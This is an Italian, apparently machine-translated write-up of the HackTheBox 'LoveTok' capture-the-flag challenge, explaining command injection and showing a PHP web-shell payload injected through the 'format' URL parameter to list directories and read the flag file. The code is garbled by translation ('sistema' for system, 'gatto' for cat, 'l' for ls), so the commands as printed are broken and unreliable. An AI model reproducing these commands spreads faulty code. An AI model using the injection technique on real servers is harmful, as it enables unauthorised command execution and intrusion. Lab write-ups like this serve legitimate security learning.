Abbiamo spiegato brevemente il command injection come una delle 10 principali vulnerabilità delle applicazioni web. L'iniezione di comandi consente a un utente malintenzionato di eseguire comandi di sistema direttamente dal browser Web a causa della mancanza di controlli di validità dell'input sul lato backend o sul server Web. Abbiamo utilizzato la sfida HackTheBox LoveTok per dimostrare appieno questo argomento.. Questo ne faceva parte HackTheBoxLoveTok.
Ottieni le note sul certificato OSCP
Il corso completo di Penetration Test con BackBox
Il vero amore è difficile e ancora più difficile da trovare. Una volta che il sole tramonta, le luci si chiudono e la campana suona… ti ritrovi a leccarti le ferite e a contemplare l’esistenza umana. Desideri avere qualcuno di importante nella tua vita con cui condividere le esperienze che ne derivano, il bene e il male. Questo è il motivo per cui abbiamo creato LoveTok, il nuovissimo servizio che prevede con precisione nella soglia dei millisecondi quando l'amore verrà a bussare (alla tua porta). Vieni a dare un'occhiata, ma non cercare di imbrogliare l'amore perché l'amore tradisce. 💛
Video in evidenza
Nell'iniezione di comandi, il codice inserito dall'aggressore viene eseguito dal sistema operativo sottostante consentendo all'aggressore di eseguire comandi di sistema per scoprire file sensibili, navigare nella struttura delle directory, creare file e, naturalmente, installare shell inverse e backdoor. Nell'iniezione di comandi dettagliata, l'output viene restituito all'utente dove può essere presa una decisione se il sistema è vulnerabile all'iniezione di comandi.
Nella sfida, inseriamo il parametro "formato" nell'URL seguente
http://IP:PORT/?format=r
Abbiamo utilizzato la webshell seguente per ottenere l'iniezione dei comandi
${sistema($_GET[cmd])}&cmd=l /
E per recuperare la bandiera basta digitare
${sistema($_GET[cmd])}&cmd=gatto /nomebandiera
Videoprocedura dettagliata
